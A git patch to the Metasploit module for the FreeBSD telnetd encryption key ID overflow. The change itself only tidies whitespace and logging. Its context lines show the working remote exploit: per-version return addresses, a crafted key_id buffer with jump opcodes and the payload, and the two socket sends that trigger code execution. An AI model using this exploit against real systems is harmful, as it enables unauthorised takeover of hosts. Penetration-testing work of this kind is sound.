From 03a39f7fe8952b1a24c7dbe66573721206436fef Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 9 Jan 2012 02:21:39 -0600 Subject: [PATCH] Whitespace cleanup, also change print_status usage when verbose --- .../freebsd/telnet/telnet_encrypt_keyid.rb | 32 +++++++++---------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb index 42055b84b9..58139ad0b9 100755 --- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb @@ -15,7 +15,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - + include Msf::Exploit::Remote::Telnet include Msf::Exploit::BruteTargets @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], [ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx [ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx [ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx @@ -63,10 +63,10 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_target(t) - + connect banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s) - print_status(banner_sanitized) if datastore['VERBOSE'] + vprint_status(banner_sanitized) enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0" enc_keyid = "\xff\xfa\x26\x07" @@ -74,18 +74,18 @@ class Metasploit3 < Msf::Exploit::Remote # Telnet protocol requires 0xff to be escaped with another penc = payload.encoded.gsub("\xff", "\xff\xff") - + key_id = Rex::Text.rand_text_alphanumeric(400) - key_id[ 0, 2] = "\xeb\x76" + key_id[ 0, 2] = "\xeb\x76" key_id[72, 4] = [ t['Ret'] - 20 ].pack("V") - key_id[76, 4] = [ t['Ret'] ].pack("V") - + key_id[76, 4] = [ t['Ret'] ].pack("V") + # Some of these bytes can get mangled, jump over them key_id[80,112] = Rex::Text.rand_text_alphanumeric(112) - + # Bounce to the real payload (avoid corruption) key_id[120, 2] = "\xeb\x46" - + # The actual payload key_id[192, penc.length] = penc @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote # Initiate encryption sock.put(enc_init) - + # Wait for a successful response loop do data = sock.get_once(-1, 5) rescue nil @@ -106,8 +106,8 @@ class Metasploit3 < Msf::Exploit::Remote # The first request smashes the pointer print_status("Sending first payload") - sock.put(sploit) - + sock.put(sploit) + # Make sure the server replied to the first request data = sock.get_once(-1, 5) unless data @@ -117,13 +117,13 @@ class Metasploit3 < Msf::Exploit::Remote # Some delay between each request seems necessary in some cases ::IO.select(nil, nil, nil, 0.5) - + # The second request results in the pointer being called print_status("Sending second payload...") sock.put(sploit) - + handler - + ::IO.select(nil, nil, nil, 0.5) disconnect end